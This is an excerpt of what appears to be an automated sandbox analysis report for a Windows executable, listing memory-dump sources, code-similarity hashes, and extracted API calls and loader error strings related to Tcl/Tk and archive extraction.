                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5731B673B08B4242E7249F25644027D76E9AF86B90F14923CEA9D93BD5EF3DD0139709
                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000008.00000002.4118984545.00007FF6E1B31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6E1B30000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4118707378.00007FF6E1B30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119241171.00007FF6E1B5A000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119451353.00007FF6E1B6D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119451353.00007FF6E1B7C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1B7E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1B94000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BBE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BC7000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BCB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BD5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ff6e1b30000_A19A.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: ea08c2437e4e3c4698eed2d9fd972e66d262d614c61166a858f736d4a7407d73
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: cd1be716f26e97fabbf795b46d9e9509ad1c754fd0b3e21d6d7dfa59cedd7b50
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ea08c2437e4e3c4698eed2d9fd972e66d262d614c61166a858f736d4a7407d73
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4EF09C727282558BDB98DF6DB44272977D0F7083C0F80A13AD58DC3B94DA3D90509F09
                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000008.00000002.4118984545.00007FF6E1B31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6E1B30000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4118707378.00007FF6E1B30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119241171.00007FF6E1B5A000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119451353.00007FF6E1B6D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119451353.00007FF6E1B7C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1B7E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1B94000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BBE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BC7000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BCB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BD5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ff6e1b30000_A19A.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: AddressProc
                                                                                                                                                                                                                                                                                                                                  • String ID: Failed to get address for Tcl_Alloc$Failed to get address for Tcl_ConditionFinalize$Failed to get address for Tcl_ConditionNotify$Failed to get address for Tcl_ConditionWait$Failed to get address for Tcl_CreateInterp$Failed to get address for Tcl_CreateObjCommand$Failed to get address for Tcl_CreateThread$Failed to get address for Tcl_DeleteInterp$Failed to get address for Tcl_DoOneEvent$Failed to get address for Tcl_EvalEx$Failed to get address for Tcl_EvalFile$Failed to get address for Tcl_EvalObjv$Failed to get address for Tcl_Finalize$Failed to get address for Tcl_FinalizeThread$Failed to get address for Tcl_FindExecutable$Failed to get address for Tcl_Free$Failed to get address for Tcl_GetCurrentThread$Failed to get address for Tcl_GetObjResult$Failed to get address for Tcl_GetString$Failed to get address for Tcl_GetVar2$Failed to get address for Tcl_Init$Failed to get address for Tcl_MutexLock$Failed to get address for Tcl_MutexUnlock$Failed to get address for Tcl_NewByteArrayObj$Failed to get address for Tcl_NewStringObj$Failed to get address for Tcl_SetVar2$Failed to get address for Tcl_SetVar2Ex$Failed to get address for Tcl_ThreadAlert$Failed to get address for Tcl_ThreadQueueEvent$Failed to get address for Tk_GetNumMainWindows$Failed to get address for Tk_Init$GetProcAddress$Tcl_Alloc$Tcl_ConditionFinalize$Tcl_ConditionNotify$Tcl_ConditionWait$Tcl_CreateInterp$Tcl_CreateObjCommand$Tcl_CreateThread$Tcl_DeleteInterp$Tcl_DoOneEvent$Tcl_EvalEx$Tcl_EvalFile$Tcl_EvalObjv$Tcl_Finalize$Tcl_FinalizeThread$Tcl_FindExecutable$Tcl_Free$Tcl_GetCurrentThread$Tcl_GetObjResult$Tcl_GetString$Tcl_GetVar2$Tcl_Init$Tcl_MutexLock$Tcl_MutexUnlock$Tcl_NewByteArrayObj$Tcl_NewStringObj$Tcl_SetVar2$Tcl_SetVar2Ex$Tcl_ThreadAlert$Tcl_ThreadQueueEvent$Tk_GetNumMainWindows$Tk_Init
                                                                                                                                                                                                                                                                                                                                  • API String ID: 190572456-2208601799
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: f2a63a6368bd24169675c041ca24025962e4e687bdbe2194ee438000f2696acf
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 9d46c443b1f47b76d6cb5874eae28e4d0da5bba6a686ec809c47780da6fa566f
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f2a63a6368bd24169675c041ca24025962e4e687bdbe2194ee438000f2696acf
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: CBE1C962A1DB0392EB559B14F85437433ABAF0B750BC47131D40DC62E4EFBEA559E20B
                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000008.00000002.4118984545.00007FF6E1B31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6E1B30000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4118707378.00007FF6E1B30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119241171.00007FF6E1B5A000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119451353.00007FF6E1B6D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119451353.00007FF6E1B7C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1B7E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1B94000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BBE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BC7000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BCB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BD5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ff6e1b30000_A19A.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: MoveWindow$ObjectSelect$DrawReleaseText
                                                                                                                                                                                                                                                                                                                                  • String ID: P%
                                                                                                                                                                                                                                                                                                                                  • API String ID: 2147705588-2959514604
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 2abf96d7e756ec95747b6225775113f5ca3bbb9c1d9d148edce5ba3104c9dbe9
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: d40c6986596e531047ad0758c0c46d6cd93a780057a2cc4fe4c3372a6f447349
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2abf96d7e756ec95747b6225775113f5ca3bbb9c1d9d148edce5ba3104c9dbe9
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3B510726618BA187D7349F36E4182BAB7A2F798B65F004121EBCF83684DF7DD045EB14
                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000008.00000002.4118984545.00007FF6E1B31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6E1B30000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4118707378.00007FF6E1B30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119241171.00007FF6E1B5A000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119451353.00007FF6E1B6D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119451353.00007FF6E1B7C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1B7E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1B94000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BBE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BC7000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BCB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BD5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ff6e1b30000_A19A.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                                                                                                  • String ID: f$f$p$p$f
                                                                                                                                                                                                                                                                                                                                  • API String ID: 3215553584-1325933183
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 864902cbb2e935f55fbb0b0f358a3d1305b233c90ffe52d12db1516ed6b7c985
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 23df94206e17b54850a4dd5bdffcd2670c797dda6c724819ddf3594be399280e
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 864902cbb2e935f55fbb0b0f358a3d1305b233c90ffe52d12db1516ed6b7c985
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4612A573E0D14385FB209A14E1547FD7261FB81750F94E135E689866C4EF3EEC82AB4A
                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000008.00000002.4118984545.00007FF6E1B31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6E1B30000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4118707378.00007FF6E1B30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119241171.00007FF6E1B5A000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119451353.00007FF6E1B6D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119451353.00007FF6E1B7C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1B7E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1B94000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BBE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BC7000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BCB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BD5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ff6e1b30000_A19A.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: Message
                                                                                                                                                                                                                                                                                                                                  • String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
                                                                                                                                                                                                                                                                                                                                  • API String ID: 2030045667-3659356012
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 8c9ea0d5efb021601edbeb70524850f4b60d460c4b86506f20de974dd0eba6ca
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: a3c44e938885e3d896017679c22c47220734f419533e61ff30758eafbbaafaca
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8c9ea0d5efb021601edbeb70524850f4b60d460c4b86506f20de974dd0eba6ca
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0541BE23A0864282EB14DB11E4443AAB3A5EF46790F446432DE4D87A51EFBEE453E70A
                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000008.00000002.4118984545.00007FF6E1B31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6E1B30000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4118707378.00007FF6E1B30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119241171.00007FF6E1B5A000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119451353.00007FF6E1B6D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119451353.00007FF6E1B7C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1B7E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1B94000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BBE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BC7000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BCB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BD5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ff6e1b30000_A19A.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                                                                                                                                                                                                                                                                                  • String ID: csm$csm$csm
                                                                                                                                                                                                                                                                                                                                  • API String ID: 849930591-393685449
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 041d502785614f157d9e0dc40e6677f491242ac1b203480cf839ec3ef7e6c674
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: acc7d22920c1ff841db44f44d23835df0a0409f6312b65275a33492db4d8a062
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 041d502785614f157d9e0dc40e6677f491242ac1b203480cf839ec3ef7e6c674
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 19E1D133A1874187EB209F25D4883AD77A0FB56788F402136EE4D97B55CF79E0A2D706
                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • FreeLibrary.KERNEL32(?,00000000,?,00007FF6E1B4E182,?,?,00000208D2DD8AF8,00007FF6E1B4A253,?,?,?,00007FF6E1B4A14A,?,?,?,00007FF6E1B454A2), ref: 00007FF6E1B4DF64
                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(?,00000000,?,00007FF6E1B4E182,?,?,00000208D2DD8AF8,00007FF6E1B4A253,?,?,?,00007FF6E1B4A14A,?,?,?,00007FF6E1B454A2), ref: 00007FF6E1B4DF70
                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000008.00000002.4118984545.00007FF6E1B31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6E1B30000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4118707378.00007FF6E1B30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119241171.00007FF6E1B5A000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119451353.00007FF6E1B6D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119451353.00007FF6E1B7C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1B7E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1B94000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BBE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BC7000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BCB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BD5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ff6e1b30000_A19A.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: AddressFreeLibraryProc
                                                                                                                                                                                                                                                                                                                                  • String ID: api-ms-$ext-ms-
                                                                                                                                                                                                                                                                                                                                  • API String ID: 3013587201-537541572
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: d8cc7062eaeb840b6a05769bf190717e46830e73a0557d63fb398ab5923ee7ee
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 1f18987dacff0a8cb555fb83cff6bb83915a095c24701b9ad7aee89a0e033b24
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d8cc7062eaeb840b6a05769bf190717e46830e73a0557d63fb398ab5923ee7ee
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 35410663B3961291FB25DB1698107753291BF6ABD0F08A135DD0DC7788EF3EE406A30A
                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF6E1B3101D), ref: 00007FF6E1B376CF
                                                                                                                                                                                                                                                                                                                                  • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF6E1B3101D), ref: 00007FF6E1B3771F
                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000008.00000002.4118984545.00007FF6E1B31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6E1B30000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4118707378.00007FF6E1B30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119241171.00007FF6E1B5A000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119451353.00007FF6E1B6D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119451353.00007FF6E1B7C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1B7E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1B94000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BBE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BC7000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BCB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BD5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ff6e1b30000_A19A.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: ByteCharMultiWide
                                                                                                                                                                                                                                                                                                                                  • String ID: Failed to encode wchar_t as UTF-8.$Failed to get UTF-8 buffer size.$Out of memory.$WideCharToMultiByte$win32_utils_to_utf8
                                                                                                                                                                                                                                                                                                                                  • API String ID: 626452242-27947307
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 29c5713369a821ffdf206052f52b70c9c71ca66087eebd3ab8d6d8eadb6ef28e
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: a7be03a86726f407a8c1b567bbb9409cedb6fff0de0a9596f994f9c0aeeae310
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 29c5713369a821ffdf206052f52b70c9c71ca66087eebd3ab8d6d8eadb6ef28e
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D041D633608B82C2D721CF11F44426AB7A6FB86790F546135DA8D87B94DF7DD062E705
                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • WideCharToMultiByte.KERNEL32(?,00007FF6E1B336B9), ref: 00007FF6E1B37BB1
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00007FF6E1B32620: GetLastError.KERNEL32(00000000,00000000,00000000,00007FF6E1B37774,?,?,?,?,?,?,?,?,?,?,?,00007FF6E1B3101D), ref: 00007FF6E1B32654
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00007FF6E1B32620: MessageBoxW.USER32 ref: 00007FF6E1B32730
                                                                                                                                                                                                                                                                                                                                  • WideCharToMultiByte.KERNEL32(?,00007FF6E1B336B9), ref: 00007FF6E1B37C25
                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000008.00000002.4118984545.00007FF6E1B31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6E1B30000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4118707378.00007FF6E1B30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119241171.00007FF6E1B5A000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119451353.00007FF6E1B6D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119451353.00007FF6E1B7C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1B7E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1B94000.00000002.00000001.01000000.00000008.sdmpDownload File
